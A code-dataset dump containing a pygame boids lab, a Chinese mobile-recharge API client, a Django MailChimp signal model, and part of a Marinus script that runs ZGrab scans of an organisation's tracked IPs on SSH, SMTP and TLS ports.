ab77d94e70a98628a260f53902bdd8a90be36265 | ab1d0fcd4900e0a88d49999cbbde4b06cc441e5d | /Labs/Lab 3/Lab3/Boids.py | fd61d89efc38e7991605f09d6257f5c325460d9d | [] | no_license | ThomasMGilman/ETGG1803_ConceptsOf3DGraphicsAndMath | bf261b7ce16bb686e42b1a2600aa97b4f8984b65 | fdf4e216b117769246154cd360b2c321f4581354 | refs/heads/master | 2020-03-29T23:14:05.715926 | 2018-09-26T17:18:25 | 2018-09-26T17:18:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | import flock
import pygame
import math3d
import random
# Pygame startup
pygame.init()
win_width = 800
win_height = 600
screen = pygame.display.set_mode((win_width, win_height))
fontObj = pygame.font.SysFont("Courier New", 12)
clock = pygame.time.Clock()
done = False
paused = False
# This is a list of circular "obstacles" (pos_vector, rad)
obstacles = []
for i in range(3):
x = random.randint(0, win_width)
y = random.randint(0, win_height)
obstacles.append([math3d.VectorN(x, y), random.randint(50, 150)])
# Create the flock. Flock-members shouldn't spawn on obstacles (if doing the bonus)
F = flock.Flock((0,0,win_width,win_height), 20, obstacles)
# The mouse position (or None if the user isn't clicking)
mpos = None
# Game Loop
while not done:
# Update
deltaTime = clock.tick() / 1000.0
if paused:
deltaTime = 0.0 # Everything remains functional, but we don't move anything...
F.update(deltaTime, mpos)
# Input
event = pygame.event.poll()
if event.type == pygame.KEYDOWN and event.key == pygame.K_p:
paused = not paused
keys = pygame.key.get_pressed()
mx, my = pygame.mouse.get_pos()
if keys[pygame.K_ESCAPE]:
done = True
if pygame.mouse.get_pressed()[0]:
mouseClicked = True
mpos = math3d.VectorN(mx, my)
else:
mouseClicked = False
mpos = None
# Draw
screen.fill((0,0,0))
for o in obstacles:
pygame.draw.circle(screen, (0,128,0), o[0].int(), o[1])
F.render(screen)
if mouseClicked:
screen.blit(fontObj.render("--Mouse Button Down--", False, (255,255,255)), (0,0))
pygame.display.flip()
# Shutdown
pygame.quit()
| [
"[email protected]"
] | |
52e69b7d9ab9be96457650a33223304431a7087b | 583d03a6337df9f1e28f4ef6208491cf5fb18136 | /dev4qx/madeira/handlers/data/zhixin.py | 575cabc375e33c3480809e11ab34c9e4197cd44f | [] | no_license | lescpsn/lescpsn | ece4362a328f009931c9e4980f150d93c4916b32 | ef83523ea1618b7e543553edd480389741e54bc4 | refs/heads/master | 2020-04-03T14:02:06.590299 | 2018-11-01T03:00:17 | 2018-11-01T03:00:17 | 155,309,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,763 | py | # 智信接口
import logging
import json
import time
import tornado.gen
from tornado.httpclient import AsyncHTTPClient, HTTPError
from utils.encryption_decryption import to_md5
request_log = logging.getLogger("madeira.request")
RESULT_MAP = {
    '2': 0,  # Success
    '602': 9,  # Server failed to receive the request data
    '603': 9,  # Request parameter format error
    '606': 9,  # Data signature error
    '621': 9,  # Insufficient merchant balance
    '622': 9,  # Merchant does not exist
    '623': 9,  # Product configured incorrectly
    '624': 9,  # Product not configured
    '615': 9,  # Phone number region information not configured
    '625': 9,  # Duplicate order number
    '751': 9,  # IP address not bound
    '626': 9,  # Order number does not exist
}
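# Any upstream code not listed above falls back to the internal result code 9
# via RESULT_MAP.get(code, 9) in up_zhixin(); for example, RESULT_MAP.get('2', 9)
# returns 0 (success) while an unknown code such as '999' maps to 9.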
@tornado.gen.coroutine
def up_zhixin(handler, partner):
handler.up_req_time = time.localtime()
time_now = time.localtime()
secret_key = partner["secret_key"]
mrch_no = partner["mrch_no"]
site_num = ""
request_time = time.strftime("%Y%m%d%H%M%S", time_now)
client_order_no = handler.order_id
product_type = 4
phone_no = handler.mobile
cp = ""
city_code = ""
recharge_type = 0
recharge_desc = ""
notify_url = partner["notify_url"]
recharge_amount = None
k = 'private:zhixin:{carrier}:{price}'.format(carrier=handler.carrier, price=handler.price)
recharge_amount = handler.slave.get(k)
if recharge_amount is None:
handler.up_result = 5003
return handler.up_result
sign = to_md5(
"city_code" + city_code + "client_order_no" + client_order_no + "cp" + cp + "mrch_no" + mrch_no + "notify_url" + notify_url + "phone_no" + phone_no + "product_type" + str(
product_type) + "recharge_amount" + str(
recharge_amount) + "recharge_desc" + recharge_desc + "recharge_type" + str(
recharge_type) + "request_time" + request_time + "site_num" + site_num + secret_key)
body = {
"mrch_no": mrch_no,
"site_num": site_num,
"request_time": request_time,
"client_order_no": client_order_no,
"product_type": product_type,
"phone_no": phone_no,
"cp": cp,
"city_code": city_code,
"recharge_amount": recharge_amount,
"recharge_type": recharge_type,
"recharge_desc": recharge_desc,
"notify_url": notify_url,
"sign": sign,
}
body = json.dumps(body)
url = partner["url_busi"]
h = {'Content-Type': 'application/json; charset=utf-8'}
result = 9999
up_result = None
http_client = AsyncHTTPClient()
try:
request_log.info("REQU %s", body, extra={'orderid': handler.order_id})
response = yield http_client.fetch(url, method='POST', body=body, headers=h, request_timeout=120)
except HTTPError as http_error:
request_log.error('CALL UPSTREAM FAIL %s', http_error, extra={'orderid': handler.order_id})
result = 60000 + http_error.code
response = None
except Exception as e:
request_log.error('CALL UPSTREAM FAIL %s', e, extra={'orderid': handler.order_id})
response = None
finally:
http_client.close()
handler.up_resp_time = time.localtime()
if response and response.code == 200:
response_body = response.body.decode('utf8')
request_log.info("RESP %s", response_body, extra={'orderid': handler.order_id})
try:
response_body = json.loads(response_body)
up_result = response_body["code"]
result = RESULT_MAP.get(up_result, 9)
handler.up_result = up_result
except Exception as e:
result = 9999
handler.up_result = result
request_log.error('PARSE UPSTREAM %s', e, extra={'orderid': handler.order_id})
return result | [
"[email protected]"
] | |
b39e713e9b9d37a4a0137e5f0283d1dbfadfd28d | 3986a89bb2c7fbc679dae33b0e1c280caa032885 | /marketing/models.py | 7f955fcc2f80924dcb266fe5005f66793ebf8076 | [] | no_license | sajalmia381/ecommerce | 9d46d9e00b5c58b294bc6d96019d389a24f57952 | 9e09da97c714b42bb415ff3cce87ff91cd69f925 | refs/heads/master | 2022-12-11T15:00:37.643467 | 2019-08-12T14:20:45 | 2019-08-12T14:20:45 | 123,375,046 | 0 | 0 | null | 2022-12-08T02:10:36 | 2018-03-01T03:09:26 | CSS | UTF-8 | Python | false | false | 1,097 | py | from django.db import models
from django.conf import settings
from django.db.models.signals import post_save
from .utils import MailChimp
# Create your models here.
class MarketingPreference(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
subscribe = models.BooleanField(default=True)
mailchimp_mes = models.TextField(null=True, blank=True)
timestremp = models.DateTimeField(auto_now_add=True)
update_on = models.DateTimeField(auto_now=True)
def __str__(self):
return self.user.email
def marking_pre_update_reciver(sender, instance, created, *args, **kwargs):
if created:
status_code, response_data = MailChimp().subscribe(instance.user.email)
print(status_code, response_data)
post_save.connect(marking_pre_update_reciver, sender=MarketingPreference)
def make_marketing_pre_reciver(sender, instance, created, *args, **kwargs):
if created:
MarketingPreference.objects.get_or_create(user=instance)
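# Signal chain: creating a User fires make_marketing_pre_reciver, which creates a
# MarketingPreference; that creation in turn fires marking_pre_update_reciver,
# which subscribes the user's email address via MailChimp().subscribe().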
post_save.connect(make_marketing_pre_reciver, sender=settings.AUTH_USER_MODEL) | [
"[email protected]"
] | |
4acec8ace69eef5aab6e597888b33efb4cfdabc3 | f9c7f734e13fa3c61347fe475306a6759940b860 | /python3_cron_scripts/zgrab_port_ip.py | 7c1c7b6e9d77c38598728e28b330e0706eb6664f | [
"Apache-2.0"
] | permissive | DalavanCloud/Marinus | 48936f54395bae7c3e39dcffed77bb6fae3b473c | a9f3c4a54f6bf5c044121ac6d8d3d18a7a0e09d0 | refs/heads/master | 2020-04-29T12:32:17.645410 | 2019-03-16T00:37:11 | 2019-03-16T00:37:11 | 176,140,449 | 1 | 0 | null | 2019-03-17T18:07:18 | 2019-03-17T18:07:18 | null | UTF-8 | Python | false | false | 30,397 | py | #!/usr/bin/python3
# Copyright 2019 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""
This script will use ZGrab or ZGrab 2.0 for port scans of the specified ports.
It differs from the zgrab_http scripts in that it takes a more basic look at the connection.
For instance, it does not follow HTTP redirects and it does not support domains as input.
With regards to sleep and batch size, the sleep is how long it will wait between batches.
Therefore, if the batch size is 50 and the sleep time is 10, then it will sleep for 10 seconds, process 50 hosts
from the queue, sleep 10 seconds, test another 50 hosts, etc. The sleep time does not refer to how long it sleeps
between individual host connections.
The original ZGrab has been deprecated and replaced with ZGrab 2.0. This script will support using either version.
However, the version that you use in the Python scripts should match the version that you have specified in the
web server configuration. The schemas between ZGrab and ZGrab 2.0 are not compatible.
You can specify the location of ZGrab using the command line. The script assumes that paths with "zgrab2"
in them indicate that you're running ZGrab 2.0. Otherwise, it will assume that you are running the original
ZGrab.
Please note that this script writes its output to a "./json_p{#}" directory for the port that you are scanning.
If the directory does not exist, then this script will create it.
https://github.com/zmap/zgrab
https://github.com/zmap/zgrab2
"""
import argparse
import json
import os
import queue
import random
import subprocess
import threading
import time
from datetime import datetime, timedelta
from bson.objectid import ObjectId
from dateutil.parser import parse
from netaddr import IPAddress, IPNetwork
from libs3 import RemoteMongoConnector, JobsManager
from libs3.ZoneManager import ZoneManager
# Globals that need to maintain consistency between threads.
global_exit_flag = 0
global_queue_lock = threading.Lock()
global_work_queue = queue.Queue()
global_queue_size = 50
global_sleep_time = 0
global_zgrab_path = "./zgrab/src/github.com/zmap/zgrab2/zgrab2"
global_port_names = {"22": "ssh",
"25": "smtp",
"80": "http",
"443": "tls",
"465": "smtp"}
def is_running(process):
"""
    Is the provided process name currently running?
"""
proc_list = subprocess.Popen(["pgrep", "-f", process], stdout=subprocess.PIPE)
for proc in proc_list.stdout:
if proc.decode('utf-8').rstrip() != str(os.getpid()) and proc.decode('utf-8').rstrip() != str(os.getppid()):
return True
return False
def get_aws_ips(rm_connector):
"""
Get the list of AWS CIDRs.
"""
aws_ips = []
aws_ips_collection = rm_connector.get_aws_ips_connection()
results = aws_ips_collection.find({})
for result in results[0]['prefixes']:
aws_ips.append(IPNetwork(result['ip_prefix']))
return aws_ips
def get_azure_ips(rm_connector):
"""
    Get the list of Azure CIDRs.
"""
azure_ips = []
azure_ips_collection = rm_connector.get_azure_ips_connection()
results = azure_ips_collection.find({})
for result in results[0]['prefixes']:
azure_ips.append(IPNetwork(result['ip_prefix']))
return azure_ips
def check_in_cidr(ip_addr, cidrs):
"""
Is the provided IP in one of the provided CIDRs?
"""
try:
local_ip = IPAddress(ip_addr)
for network in cidrs:
if local_ip in network:
return True
except:
return False
return False
def is_local_ip(ip):
"""
Returns true if it is a local IP address
"""
if check_in_cidr(ip, [IPNetwork("10.0.0.0/8"), IPNetwork("172.16.0.0/12"),
IPNetwork("192.168.0.0/16"), IPNetwork("127.0.0.0/8")]) or \
ip == "255.255.255.255":
return True
return False
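# Illustrative behaviour of is_local_ip(): "10.1.2.3" and "127.0.0.1" return
# True (they fall in the RFC 1918 / loopback ranges above), while a public
# address such as "8.8.8.8" returns False.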
def is_aws_ip(ip_addr, aws_ips):
"""
Is the provided IP within one of the AWS CIDRs?
"""
return check_in_cidr(ip_addr, aws_ips)
def is_azure_ip(ip_addr, azure_ips):
"""
    Is the provided IP within one of the Azure CIDRs?
"""
return check_in_cidr(ip_addr, azure_ips)
def is_tracked_ip(ip_addr, tracked_ips):
"""
Is the provided IP within one of the tracked CIDRs?
"""
return check_in_cidr(ip_addr, tracked_ips)
def get_ip_zones(rm_connector):
"""
Get the list of IP Zones
"""
ip_zones_collection = rm_connector.get_ipzone_connection()
ipz_results = ip_zones_collection.find({'status': {"$ne": 'false_positive'}})
ip_zones = []
for ipz in ipz_results:
ip_zones.append(IPNetwork(ipz['zone']))
return ip_zones
def get_mx_ips(zones, all_dns_collection):
"""
Get hosts identified via MX records for SMTP scans.
Zgrab works on IPs and MX records are typically domain names.
    Therefore, we use the all_dns table to look up the IP address for the record.
"""
ips = set([])
ip_context = []
mx_results = all_dns_collection.find({'type': 'mx'})
for result in mx_results:
record = result['value']
if " " in result['value']:
parts = result['value'].split(" ")
record = parts[1]
if record.endswith("."):
record = record[:-1]
if zone_compare(record, zones) is not None:
ip_results = all_dns_collection.find({'fqdn': record})
for result in ip_results:
if result['type'] == 'a':
if not is_local_ip(result['value']):
ips.add(result['value'])
ip_context.append({'ip': result['value'], 'domain': result['fqdn'], 'source':'all_dns', 'zone': result['zone']})
elif result['type'] == 'cname':
if zone_compare(result['value'], zones):
second_results = all_dns_collection.find({'fqdn': result['value']})
for s_result in second_results:
if s_result['type'] == 'a':
if not is_local_ip(s_result['value']):
ips.add(s_result['value'])
ip_context.append({'ip': s_result['value'], 'domain': s_result['fqdn'], 'source':'all_dns', 'zone': s_result['zone']})
# Don't want to look like a network scan
# Set doesn't support random.shuffle
ips_list = list(ips)
random.shuffle(ips_list)
return (ips_list, ip_context)
def get_only_ipzones(ip_zones):
"""
Get the list of IPs from IP zones to limit the scans to data centers
"""
ips = set([])
ip_context = []
for ipz in ip_zones:
for ip in ipz:
if ip != ipz.network and ip != ipz.broadcast:
ips.add(str(ip))
# Don't want to look like a network scan
# Set doesn't support random.shuffle
ips_list = list(ips)
random.shuffle(ips_list)
return (ips_list, ip_context)
def get_ips(ip_zones, all_dns_collection):
"""
Get the list of all IPs that are being tracked by Marinus.
"""
ips = set([])
ip_context = []
domain_results = all_dns_collection.find({'type': 'a'})
for result in domain_results:
if not is_local_ip(result['value']):
ips.add(result['value'])
ip_context.append({'ip': result['value'], 'domain': result['fqdn'], 'source': 'all_dns', 'zone': result['zone']})
for ipz in ip_zones:
for ip in ipz:
if ip != ipz.network and ip != ipz.broadcast:
ips.add(str(ip))
# Don't want to look like a network scan
# Set doesn't support random.shuffle
ips_list = list(ips)
random.shuffle(ips_list)
return (ips_list, ip_context)
def check_ip_context(ip, ip_context):
"""
Check for matching ip_context records
"""
matches = []
for entry in ip_context:
if entry['ip'] == ip:
matches.append(entry)
return matches
def zone_compare(value, zones):
"""
Determines whether value is in a known zone
"""
for zone in zones:
if value.endswith("." + zone) or value == zone:
return zone
return None
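# Illustrative behaviour (hypothetical zone list): with zones = ["example.org"],
# zone_compare("www.example.org", zones) returns "example.org" while
# zone_compare("example.com", zones) returns None.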
def check_in_zone(entry, zones):
"""
Obtain the DNS names from the common_name and dns_zones from the entry's SSL certificate.
Determine if the entry's DNS names is in the list of provided zones.
Return the matched zone.
"""
try:
certificate = entry['server_certificates']['certificate']
except:
return []
try:
temp1 = certificate["parsed"]["subject"]["common_name"]
except KeyError:
temp1 = []
try:
temp2 = certificate["parsed"]["extensions"]["subject_alt_name"]["dns_names"]
except KeyError:
temp2 = []
cert_zones = []
value_array = temp1 + temp2
for value in value_array:
zone = zone_compare(value, zones)
if zone is not None and zone not in cert_zones:
cert_zones.append(zone)
return cert_zones
def insert_result(entry, port, ip_context, all_zones, results_collection):
"""
Insert the matched domain into the collection of positive results.
"""
if 'zgrab2' in global_zgrab_path:
temp_date = entry['data'][global_port_names[port]]['timestamp']
new_date = parse(temp_date)
entry["timestamp"] = new_date
entry['data'][global_port_names[port]]['timestamp'] = new_date
else:
temp_date = entry["timestamp"]
new_date = parse(temp_date)
entry["timestamp"] = new_date
# Returns all entries in ip_context that contain the given IP
matches = check_ip_context(entry['ip'], ip_context)
# Grab the zones from the ip_context
zones = []
domains = []
if len(matches) > 0:
for match in matches:
if match['zone'] not in zones:
zones.append(match['zone'])
if match['domain'] not in domains:
domains.append(match['domain'])
# Append the zones from the TLS certificate
if port == "443":
# Make the timestamp an actual date instead of a string
entry['data']['tls']['timestamp'] = new_date
if 'zgrab2' in global_zgrab_path:
cert_zones = check_in_zone(entry['data']['tls']['result']['handshake_log'], all_zones)
else:
cert_zones = check_in_zone(entry['data']['tls'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
elif port == "22":
if 'zgrab2' in global_zgrab_path:
entry['data']['ssh']['timestamp'] = new_date
else:
entry['data']['xssh']['timestamp'] = new_date
elif port == "25":
if 'zgrab2' in global_zgrab_path:
if 'tls' in entry['data']['smtp']['result']:
cert_zones = check_in_zone(entry['data']['smtp']['result']['tls']['handshake_log'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
else:
temp = entry['data']
entry['data'] = {}
entry['data']['smtp'] = temp
entry['data']['smtp']['timestamp'] = new_date
if 'tls' in entry['data']['smtp']:
cert_zones = check_in_zone(entry['data']['smtp']['tls']['response'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
elif port == "465":
temp = entry['data'].pop('smtp')
entry['data']['smtps'] = temp
if 'zgrab2' in global_zgrab_path:
if 'tls' in entry['data']['smtps']['result']:
cert_zones = check_in_zone(entry['data']['smtps']['result']['tls']['handshake_log'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
else:
temp = entry['data']
entry['data'] = {}
entry['data']['smtps'] = temp
entry['data']['smtps']['timestamp'] = new_date
if 'tls' in entry['data']['smtps']:
cert_zones = check_in_zone(entry['data']['smtps']['tls'], all_zones)
for zone in cert_zones:
if zone not in zones:
zones.append(zone)
entry['zones'] = zones
entry['domains'] = domains
exists = results_collection.find({"ip": entry['ip']}).count()
if exists == 0:
results_collection.insert(entry)
elif port == "443":
results_collection.update({"ip": entry['ip']}, {"$set": {"data.tls": entry['data']['tls'], 'timestamp': entry['timestamp']}})
elif port == "22":
if 'zgrab2' in global_zgrab_path:
results_collection.update({"ip": entry['ip']}, {"$set": {"data.ssh": entry['data']['ssh'], 'timestamp': entry['timestamp']}})
else:
results_collection.update({"ip": entry['ip']}, {"$set": {"data.xssh": entry['data']['xssh'], 'timestamp': entry['timestamp']}})
elif port == "25":
results_collection.update({"ip": entry['ip']}, {"$set": {"data.smtp": entry['data']['smtp'], 'timestamp': entry['timestamp']}})
elif port == "465":
results_collection.update({"ip": entry['ip']}, {"$set": {"data.smtps": entry['data']['smtps'], 'timestamp': entry['timestamp']}})
def run_port_22_command(target_list, tnum):
"""
Use Zgrab to make an SSH connection
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
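    # The targets string uses a literal backslash-n ("\\n") between IPs; "echo -e" below expands those
    # into real newlines for zgrab's stdin, and the [:-2] slice trims the trailing two-character separator.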
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "ssh", "--port=22", "--verbose", "--timeout=30", "--output-file=./json_p22/p22-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=22", "--xssh", "--xssh-verbose", "-banners", "--timeout=30", "--output-file=./json_p22/p22-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def run_port_25_command(target_list, tnum):
"""
Use Zgrab to attempt an SMTP connection with StartTLS
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "smtp", "--port=25", "--starttls", "--timeout=30", "--output-file=./json_p25/p25-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=25", "--smtp", "--starttls", "--banners", "--timeout=30", "--output-file=./json_p25/p25-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def run_port_25_no_tls_command(target_list, tnum):
"""
    Use Zgrab to attempt a connection on port 25 without using StartTLS
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "smtp", "--port=25", "--timeout=30", "--output-file=./json_p25/p25-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=25", "--smtp", "--banners", "--timeout=30", "--output-file=./json_p25/p25-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def run_port_443_command(target_list, tnum):
"""
Use ZGrab to do a simple HTTPS connection.
None of the fancier HTTP connection options are used (e.g. follow redirects)
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "tls", "--port=443", "--timeout=30", "--output-file=./json_p443/p443-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=443", "--tls", "--chrome-ciphers", "--timeout=30", "--output-file=./json_p443/p443-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def run_port_465_command(target_list, tnum):
"""
Use ZGrab to test for SMTPS on port 465
"""
if global_sleep_time > 0:
time.sleep(global_sleep_time)
targets = ""
for ip in target_list:
targets = targets + ip + "\\n"
targets = targets[:-2]
p1 = subprocess.Popen(["echo", "-e", targets], stdout=subprocess.PIPE)
if 'zgrab2' in global_zgrab_path:
p2 = subprocess.Popen([global_zgrab_path, "smtp", "--port=465", "--smtps", "--timeout=30", "--output-file=./json_p465/p465-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
parts = _.decode("utf-8").split("\n")
for entry in parts:
if entry.startswith("{"):
json_output = json.loads(entry)
return json_output
return json.loads("{}")
else:
p2 = subprocess.Popen([global_zgrab_path, "--port=465", "--smtp", "--tls", "--banners", "--timeout=30", "--output-file=./json_p465/p465-" + str(tnum) + ".json"], stdin=p1.stdout, stdout=subprocess.PIPE)
p1.stdout.close()
output, _ = p2.communicate()
json_output = json.loads(output.decode("utf-8"))
return json_output
def process_thread(ips, port, run_command, zones_struct, zgrab_collection, tnum):
"""
Runs zgrab and stores the result if necessary
"""
json_output = run_command(ips, tnum)
if ('success_count' in json_output and json_output['success_count'] > 0) or \
('statuses' in json_output and json_output['statuses'][global_port_names[port]]['successes'] > 0):
result_file = open("./json_p" + port + "/p" + port + "-" + str(tnum) + ".json", "r")
results=[]
for result in result_file:
results.append(json.loads(result))
result_file.close()
for result in results:
if ('zgrab2' in global_zgrab_path and "error" in result['data'][global_port_names[port]]) or \
'error' in result:
if port == "25":
if ('zgrab2' in global_zgrab_path and 'result' in result['data']['smtp'] and 'starttls' in result['data']['smtp']['result']) or \
"error_component" in result and result['error_component'] == "starttls":
print("Adding " + str(result['ip']) + " to retest list")
global_retest_list.append(result['ip'])
else:
print("Failed " + port + ": " + str(result['ip']))
else:
print("Failed " + port + ": " + str(result['ip']))
else:
result['aws'] = is_aws_ip(result['ip'], zones_struct['aws_ips'])
result['azure'] = is_azure_ip(result['ip'], zones_struct['azure_ips'])
result['tracked'] = is_tracked_ip(result['ip'], zones_struct['ip_zones'])
insert_result(result, port, zones_struct['ip_context'], zones_struct['zones'], zgrab_collection)
print("Inserted " + port + ": " + result['ip'])
else:
print("Failed " + port + ": " + str(ips))
def process_data(tnum, q, port, command, zones_struct, zgrab_collection):
"""
    Per-thread worker loop: pulls a batch of values from the queue, runs the scan sub-function on it, and marks the queue tasks complete.
    The global variables are never assigned locally, which keeps the names bound to the shared module-level objects.
"""
while not global_exit_flag:
global_queue_lock.acquire()
if not global_work_queue.empty():
data = []
i = 0
while i < global_queue_size:
data.append(q.get())
i = i + 1
if global_work_queue.empty():
break
global_queue_lock.release()
print ("Thread %s processing %s" % (str(tnum), data))
try:
process_thread(data, port, command, zones_struct, zgrab_collection, tnum)
except Exception as ex:
print("Thread error processing: " + str(data))
print(str(ex))
for _ in range(0,i):
q.task_done()
else:
global_queue_lock.release()
time.sleep(1)
class ZgrabThread (threading.Thread):
"""
The thread class which stores the constants for each thread.
"""
def __init__(self, thread_id, q, port, command, zones_struct, zgrab_collection):
threading.Thread.__init__(self)
self.thread_id = thread_id
self.port = port
self.zones_struct = zones_struct
self.zgrab_collection = zgrab_collection
self.run_command = command
self.q = q
def run(self):
print ("Starting Thread-" + str(self.thread_id))
process_data(self.thread_id, self.q, self.port, self.run_command, self.zones_struct, self.zgrab_collection)
print ("Exiting Thread-" + str(self.thread_id))
def check_save_location(save_location):
"""
Check to see if the directory exists.
If the directory does not exist, it will automatically create it.
"""
if not os.path.exists(save_location):
os.makedirs(save_location)
def main():
global global_exit_flag
global global_retest_list
global global_sleep_time
global global_queue_size
global global_zgrab_path
global_retest_list = []
parser = argparse.ArgumentParser(description='Launch zgrab against IPs using port 22, 25, 443, or 465.')
parser.add_argument('-p', choices=['443','22', '25', '465'], metavar="port", help='The port to scan: 22, 25, 443, or 465')
parser.add_argument('-t', default=5, type=int, metavar="threadCount", help='The number of threads')
parser.add_argument('--mx', action="store_true", help='Scan only IPs from MX records. Useful for SMTP scans.')
parser.add_argument('-s', default=0, type=int, metavar="sleepTime", help='Sleep time in order to spread out the batches')
parser.add_argument('--qs', default=0, type=int, metavar="queueSize", help='How many hosts to scan in a batch')
parser.add_argument('--zones_only', action="store_true", help='Scan only IPs from IP zones.')
parser.add_argument('--zgrab_path', default=global_zgrab_path, metavar='zgrabVersion', help='The version of ZGrab to use')
args = parser.parse_args()
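    # Illustrative invocation: "-p 443 -t 10 --qs 25" scans port 443 with ten threads, 25 hosts per batch.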
if args.p == None:
print("A port value (22, 25, 443, or 465) must be provided.")
exit(0)
if is_running(os.path.basename(__file__)):
"""
Check to see if a previous attempt to parse is still running...
"""
now = datetime.now()
print(str(now) + ": I am already running! Goodbye!")
exit(0)
now = datetime.now()
print("Starting: " + str(now))
rm_connector = RemoteMongoConnector.RemoteMongoConnector()
all_dns_collection = rm_connector.get_all_dns_connection()
jobs_manager = JobsManager.JobsManager(rm_connector, "zgrab_port_ip-" + args.p)
jobs_manager.record_job_start()
zones_struct = {}
zones_struct['zones'] = ZoneManager.get_distinct_zones(rm_connector)
zones_struct['ip_zones'] = get_ip_zones(rm_connector)
# Collect the list of AWS CIDRs
zones_struct['aws_ips'] = get_aws_ips(rm_connector)
# Collect the list of Azure CIDRs
zones_struct['azure_ips'] = get_azure_ips(rm_connector)
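    # zones_struct bundles everything the scan threads need: tracked DNS zones, the IP zones to scan,
    # and the AWS/Azure CIDR lists used to tag each result.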
if args.mx:
(ips, ip_context) = get_mx_ips(zones_struct['zones'], all_dns_collection)
elif args.zones_only:
(ips, ip_context) = get_only_ipzones(zones_struct['ip_zones'])
else:
(ips, ip_context) = get_ips(zones_struct['ip_zones'], all_dns_collection)
if args.s and int(args.s) > 0:
global_sleep_time = int(args.s)
if args.qs and int(args.qs) > 0:
global_queue_size = int(args.qs)
print("Got IPs: " + str(len(ips)))
zones_struct['ip_context'] = ip_context
zgrab_collection = rm_connector.get_zgrab_port_data_connection()
if args.p == "443":
run_command = run_port_443_command
elif args.p == "22":
run_command = run_port_22_command
elif args.p == "25":
run_command = run_port_25_command
elif args.p == "465":
run_command = run_port_465_command
check_save_location("./json_p" + args.p)
global_zgrab_path = args.zgrab_path
threads = []
print ("Creating " + str(args.t) + " threads")
for thread_id in range (1, args.t + 1):
thread = ZgrabThread(thread_id, global_work_queue, args.p, run_command, zones_struct, zgrab_collection)
thread.start()
threads.append(thread)
thread_id += 1
print("Populating Queue")
global_queue_lock.acquire()
for ip in ips:
global_work_queue.put(ip)
global_queue_lock.release()
# Wait for queue to empty
while not global_work_queue.empty():
pass
# Notify threads it's time to exit
global_exit_flag = 1
# Wait for all threads to complete
for t in threads:
t.join()
print ("Exiting Main Thread")
print("Global retest list: " + str(len(global_retest_list)))
# Retest any SMTP hosts that did not respond to the StartTLS handshake
if args.p == "25" and len(global_retest_list) > 0:
